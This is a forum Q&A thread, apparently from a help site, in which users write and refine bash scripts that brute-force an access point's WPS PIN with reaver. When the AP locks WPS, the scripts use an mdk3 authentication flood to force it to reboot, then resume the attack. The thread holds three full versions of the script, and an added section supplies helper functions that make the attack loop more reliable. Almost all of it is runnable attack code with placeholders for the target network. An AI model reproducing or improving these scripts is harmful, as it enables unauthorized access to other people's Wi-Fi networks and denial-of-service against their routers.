Bash script for reaver to unlock WPS-locked status
First of all, sorry for my bad English. I am trying to write a bash script to perform a WPS crack on an AP using reaver. The problem is that after some WPS PINs have been tried, the AP locks WPS, so my reaver is useless.
To solve this, I perform an mdk3 attack, which forces the AP to reboot and lets me attack it again (after the reboot, WPS comes back in the unlocked state).
The problems with this approach are:
- I have to be at the PC when the AP locks WPS
- I then have to run the mdk3 attack, stop it when the AP reboots, and start the reaver attack again. The obvious solution to this is a script.
I wrote the following lines, which should solve it.
I have to say I'm a noob at bash scripting, so the script isn't "professional"; it is just a "workaround" for my problem.
#!/bin/bash
while true; do
# Switch to the correct channel and save it into $channel
echo Detecting AP channel
timeout 25 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -q # Switch to the AP channel
rm ap_channel 2> /dev/null
touch ap_channel
timeout 5 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
channel="$(head -1 ap_channel | tail -c 2 | head -c 1)"
rm ap_channel
# Attacks the AP while it isn't wps-locked
rm ap_status 2> /dev/null
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
while [ -z "$(grep Locked ap_status)" ]; do
echo Performing reaver attack
aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s REAVER_PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
rm ap_status
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
done
# The AP is now locked. Performs a mdk3 attack (in order to reboot the AP) while the AP wps-status is Locked
((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > /dev/null &
mdk3_pid=$!
rm ap_status
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
while [ -n "$(grep Locked ap_status)" ]; do
echo Trying to reboot the AP
rm ap_status
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
done
# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
kill -9 $mdk3_pid
echo AP rebooted. Waiting 2 mins till AP init
sleep 120
done
The problem with this script is that the stdout redirection I use for the airodump output behaves differently when I run the line directly from the command line than when I run it inside the script.
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
I need a way to run the line above from the script as if I were running it directly in a tty. I can't do this with exec because I need the script to keep running.
Note: I can't use the -w option of airodump-ng because it doesn't save the WPS status.
Can someone help me with this?
I finally got it. I found a workaround for this problem by redirecting the command's standard output to a file. I'm posting the script in case someone finds it useful.
#!/bin/bash
# Replace AP_SSID, AP_BSSID, MY_MAC and PREV_SESSION.wpc with your own values.
while true; do
    rm -f attack ap_status ap_channel
    # Detects the AP channel
    echo Detecting AP channel
    timeout 45 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -vv > ap_channel # Switch to the AP channel
    timeout 15 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
    # The channel number is taken from the last two characters of aireplay-ng's first line
    channel="$(head -1 ap_channel | tail -c 3 | head -c 2)"
    rm -f ap_channel
    echo Detected AP channel $channel
    # Attacks the AP using reaver till the AP locks the WPS.
    # airodump-ng runs in the background with stdout and stderr captured to ap_status,
    # gets 10 seconds to list the AP, and is then killed and reaped.
    airodump-ng wlan0mon --wps --essid AP_SSID -c $channel > ap_status 2>&1 &
    airodump_pid=$!
    sleep 10
    kill -9 $airodump_pid
    wait $airodump_pid 2>/dev/null
    while [ -z "$(grep Locked ap_status)" ]; do
        echo Performing reaver attack
        aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
        timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
        airodump-ng wlan0mon --wps --essid AP_SSID -c $channel > ap_status 2>&1 &
        airodump_pid=$!
        sleep 10
        kill -9 $airodump_pid
        wait $airodump_pid 2>/dev/null
    done
    # Force a reboot in the AP to unlock WPS
    mdk3 wlan0mon a -a AP_BSSID -m > attack 2>&1 &
    mdk3_pid=$!
    airodump-ng wlan0mon --wps --essid AP_SSID -c $channel > ap_status 2>&1 &
    airodump_pid=$!
    sleep 10
    kill -9 $airodump_pid
    wait $airodump_pid 2>/dev/null
    while [ -n "$(grep -m 1 Locked ap_status)" ]; do
        echo Trying to reboot the AP
        airodump-ng wlan0mon --wps --essid AP_SSID -c $channel > ap_status 2>&1 &
        airodump_pid=$!
        sleep 10
        kill -9 $airodump_pid
        wait $airodump_pid 2>/dev/null
    done
    # The AP is now rebooted. Kill the mdk3 process and wait 5 mins to restart the reaver attack
    kill -9 $mdk3_pid
    wait $mdk3_pid 2>/dev/null
    echo AP rebooted. Waiting 5 mins till AP init
    rm -f attack ap_status
    sleep 300
done
The delays are set long, but it's OK. It depends on the AP; you can change them.
To use the script you need the aircrack, reaver (the latest version, the one with the --wps option), timeout and mdk3 packages.
It would be great if someone who knows bash scripting wanted to modify the script and upload a better one!
My variant.
Fixed delays are replaced with a dynamic wait.
It counts the PINs tried and the wait times.
Replace "-C gnome-screenshot -f" with your screenshot program or remove it.
#!/bin/bash
# Fill in the target and your own details before running.
AP_SSID="TARGET_ESSID"
AP_BSSID="TARGET_BSSID"
MY_MAC="YOUR_MAC"
MON_INTERFACE=wlan0mon
PREV_SESS_FILE="PREV_SESSION_FILE.wpc"
countFile=totalTryPinCount   # count file to store the total number of PINs tried across runs
touch "$countFile"
while true; do
    rm -f attack ap_status ap_channel assoc
    countTryPin=0     # PINs tried in this round
    waitTryReboot=0   # seconds spent waiting for the AP to reboot (mdk3 DoS)
    waitReboot=0      # seconds spent waiting for the AP to recover after the reboot
    echo -e -n "\n\nDetect channel"
    touch assoc
    # Let reaver associate with the AP; this also puts the interface on the AP channel
    reaver -i "$MON_INTERFACE" -e "$AP_SSID" -b "$AP_BSSID" -A -s "$PREV_SESS_FILE" > assoc 2>&1 &
    assoc_pid=$!
    while [ -z "$(grep Associated assoc)" ]; do
        sleep 3
        echo -n .
    done
    echo -e "\n\n"
    kill -9 $assoc_pid
    wait $assoc_pid 2>/dev/null
    rm -f assoc
    echo -n "Wait association"
    aireplay-ng -1 0 -e "$AP_SSID" -a "$AP_BSSID" -h "$MY_MAC" "$MON_INTERFACE" > ap_channel 2>&1 &
    ap_channel_pid=$!
    while [ -z "$(grep successful ap_channel)" ]; do
        sleep 1
        echo -n "."
    done
    wait $ap_channel_pid 2>/dev/null
    # The channel number is taken from the last two characters of aireplay-ng's first line
    channel="$(head -1 ap_channel | tail -c 3 | head -c 2)"
    echo -e "\n\nChannel set to $channel\n\n"
    rm -f ap_channel
    touch ap_status
    echo -n -e "\nCheck AP WPS lock"
    # Poll with short airodump-ng runs until the AP shows up in the listing
    while [ -z "$(grep "$AP_SSID" ap_status)" ]; do
        airodump-ng "$MON_INTERFACE" --wps --essid "$AP_SSID" -c $channel > ap_status 2>&1 &
        airodump_pid=$!
        echo -n .
        sleep 1
        kill -9 $airodump_pid
        wait $airodump_pid 2>/dev/null
    done
    echo -e "\n\n"
    airodump-ng "$MON_INTERFACE" --wps --essid "$AP_SSID" -c $channel > ap_status 2>&1 &
    airodump_pid=$!
    while [ -z "$(grep -m 1 "$AP_SSID" ap_status)" ]; do
        sleep 2
    done
    kill -9 $airodump_pid
    wait $airodump_pid 2>/dev/null
    # Attack with reaver until the listing shows the AP as Locked
    while [ -z "$(grep -m 1 Locked ap_status)" ]; do
        airodump-ng "$MON_INTERFACE" --wps --essid "$AP_SSID" -c $channel > ap_status 2>&1 &
        airodump_pid=$!
        echo -e "\n\nBegin reaver attack\n\n"
        echo -n "Wait association"
        aireplay-ng -1 0 -e "$AP_SSID" -a "$AP_BSSID" -h "$MY_MAC" "$MON_INTERFACE" > ap_channel 2>&1 &
        ap_channel_pid=$!
        while [ -z "$(grep successful ap_channel)" ]; do
            sleep 1
            echo -n "."
        done
        wait $ap_channel_pid 2>/dev/null
        echo -e "\n\n"
        # remove or replace "-C gnome-screenshot -f" with your screenshot program
        timeout 10 reaver -i "$MON_INTERFACE" -e "$AP_SSID" -b "$AP_BSSID" --no-nacks -vv -s "$PREV_SESS_FILE" -w -A -g 1 -C gnome-screenshot -f
        countTryPin=$((countTryPin + 1))
        kill -9 $airodump_pid
        wait $airodump_pid 2>/dev/null
    done
    # Force a reboot in the AP to unlock WPS
    mdk3 "$MON_INTERFACE" a -a "$AP_BSSID" > attack 2>&1 &
    mdk3_pid=$!
    echo -e "\n\n"
    while [ -n "$(grep -m 1 Locked ap_status)" ] && [ -n "$(grep -m 1 "$AP_SSID" ap_status)" ]; do
        airodump-ng "$MON_INTERFACE" --wps --essid "$AP_SSID" -c $channel > ap_status 2>&1 &
        airodump_pid=$!
        sleep 4
        waitTryReboot=$((waitTryReboot + 4))
        echo -e -n "\rTry calling reboot AP. Wait $waitTryReboot sec."
        kill -9 $airodump_pid
        wait $airodump_pid 2>/dev/null
    done
    # The AP is now rebooting. Kill the mdk3 process and update the total PIN count
    kill -9 $mdk3_pid
    wait $mdk3_pid 2>/dev/null
    totalTryPin=$(cat "$countFile" 2>/dev/null)
    totalTryPin=$(( ${totalTryPin:-0} + countTryPin ))
    echo "$totalTryPin" > "$countFile"
    echo -e "\n\n"
    while [ -z "$(grep "$AP_SSID" ap_status)" ]; do
        # After the reboot the AP may change channel, so run without a channel
        airodump-ng "$MON_INTERFACE" --wps --essid "$AP_SSID" > ap_status 2>&1 &
        airodump_pid=$!
        sleep 5
        waitReboot=$((waitReboot + 5))
        echo -e -n "\rAP rebooting. Wait $waitReboot sec."
        kill -9 $airodump_pid
        wait $airodump_pid 2>/dev/null
    done
    rm -f attack ap_status
    echo -e "\n\nDone $countTryPin try pin."
    echo "Calling reboot AP wait time $waitTryReboot sec."
    echo "AP rebooting wait time $waitReboot sec."
    echo "Total execute time $SECONDS sec."
    echo -e "Total try pin $totalTryPin\n\n"
    sleep 3
    SECONDS=0
done
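All three scripts in this thread do the same two things by hand: they start a terminal-oriented aircrack-ng tool in the background with its output captured to a file, poll that file for a word (Associated, successful, Locked), then kill -9 it; and they pull the channel number out of aireplay-ng's first line by slicing fixed character offsets, which is why the question's version (tail -c 2 | head -c 1) only works for single-digit channels. The helpers below are an added example, not code from any of the posts above. They factor those steps into functions with a deadline, a SIGTERM-before-SIGKILL shutdown followed by wait (so the tool can restore the terminal and is reaped instead of left as a zombie), a regex-based channel parser, and a lock check that reads only the target BSSID's line so that a Locked marker on some other entry cannot send the script into the reboot branch. Two things are assumed rather than taken from the posts: that aireplay-ng prints the channel as "on channel N", and that airodump-ng --wps shows the word Locked on the AP's line; the sample lines in the demo are constructed, not captured.

```shell
#!/bin/bash
# Added helpers (not from the thread). Run a tool that expects a terminal in the
# background, capture everything it prints to a file, and wait until either a
# pattern shows up in that file or a deadline passes. Then stop it cleanly.
#
# Usage: wait_for_pattern OUTFILE PATTERN DEADLINE_SECONDS COMMAND [ARGS...]
# Returns 0 if PATTERN appeared in OUTFILE, 1 if the deadline passed or the
# command exited without ever printing it.
wait_for_pattern() {
    local outfile=$1 pattern=$2 deadline=$3
    shift 3
    : > "$outfile"                        # truncate instead of rm + touch
    # stdin from /dev/null so a backgrounded tool never reads the script's tty
    # (assumption: the tool tolerates a non-tty stdin).
    "$@" > "$outfile" 2>&1 < /dev/null &
    local pid=$! waited=0 rc=1
    while [ "$waited" -lt "$deadline" ]; do
        if grep -q -- "$pattern" "$outfile"; then rc=0; break; fi
        if ! kill -0 "$pid" 2>/dev/null; then break; fi   # exited on its own
        sleep 1
        waited=$((waited + 1))
    done
    stop_process "$pid"
    return "$rc"
}

# SIGTERM first (airodump-ng/reaver handle it and clean up), give it a few
# seconds, SIGKILL only if it is still alive, then reap it with wait.
stop_process() {
    local pid=$1 i
    kill -TERM "$pid" 2>/dev/null || true
    for i in 1 2 3; do
        kill -0 "$pid" 2>/dev/null || break
        sleep 1
    done
    kill -KILL "$pid" 2>/dev/null || true
    wait "$pid" 2>/dev/null || true
}

# Extract the channel from an aireplay-ng capture by matching "on channel N"
# rather than slicing fixed offsets, so channels 1-9 and 10+ both work.
# Prints nothing if no such line exists.
channel_from_output() {
    sed -n 's/.*on channel \([0-9][0-9]*\).*/\1/p' "$1" | head -n 1
}

# Decide the WPS lock state from a captured airodump-ng --wps listing, looking
# only at the line that carries the target BSSID.
# Returns 0 = Locked, 1 = not locked, 2 = target not present in the capture.
wps_locked_state() {
    local outfile=$1 bssid=$2 line
    line=$(grep -i -- "$bssid" "$outfile" | head -n 1)
    [ -n "$line" ] || return 2
    case "$line" in
        *Locked*) return 0 ;;
        *)        return 1 ;;
    esac
}

# Offline demo with a constructed stand-in for aireplay-ng (no radio needed).
demo() {
    local tmp
    tmp=$(mktemp -d)
    wait_for_pattern "$tmp/ap_channel" "on channel" 10 \
        sh -c 'echo "12:00:00  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 11"; exec sleep 30'
    echo "detected channel: $(channel_from_output "$tmp/ap_channel")"
    rm -rf "$tmp"
}
if [ "${1:-}" = demo ]; then demo; fi
```

In the scripts above a real call would look like `wait_for_pattern ap_status Locked 10 airodump-ng wlan0mon --wps --essid "$AP_SSID" -c "$channel"`, followed by `wps_locked_state ap_status "$AP_BSSID"` to branch on the result. Keeping the deadline in the helper means a tool that hangs or never prints the expected word cannot stall the loop forever, which the unbounded `while grep` loops in the variant script can.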